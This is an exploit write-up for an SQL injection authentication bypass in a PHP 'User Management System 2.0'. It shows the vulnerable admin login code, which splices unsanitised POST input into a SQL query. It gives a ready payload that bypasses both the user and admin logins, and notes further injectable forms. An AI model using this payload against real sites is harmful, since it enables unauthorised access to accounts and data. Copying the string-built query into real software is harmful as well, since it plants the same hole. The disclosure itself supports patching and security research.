Exploit for User Management System 2.0 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:157361
# Exploit Title: User Management System 2.0 - Authentication Bypass  
# Author: Besim ALTINOK  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/  
# Version: v2.0  
# Tested on: Xampp  
# Credit: İsmail BOZKURT  
  
  
------ Details:  
  
1- Vulnerable code is here (admin login: /admin/index.php):  
  
<?php  
session_start();  
include("dbconnection.php");  
if(isset($_POST['login']))  
{  
$adminusername=$_POST['username'];  
$pass=md5($_POST['password']);  
$ret=mysqli_query($con,"SELECT * FROM admin WHERE  
username='$adminusername' and password='$pass'");  
$num=mysqli_fetch_array($ret);  
if($num>0)  
{  
$extra="manage-users.php";  
$_SESSION['login']=$_POST['username'];  
$_SESSION['id']=$num['id'];  
echo "<script>window.location.href='".$extra."'</script>";  
exit();  
}  
else  
{  
$_SESSION['action1']="*Invalid username or password";  
$extra="index.php";  
echo "<script>window.location.href='".$extra."'</script>";  
exit();  
}  
}  
  
2- We can bypass authentication with SQLi:  
  
Bypass code (user and admin login panel):  
  
Username: pentester' or'1'=1#  
Password : pentester' or'1'=1#  
  
Finally: There is a lot of SQLi input in this project. Like, login,  
registration, forgot password ...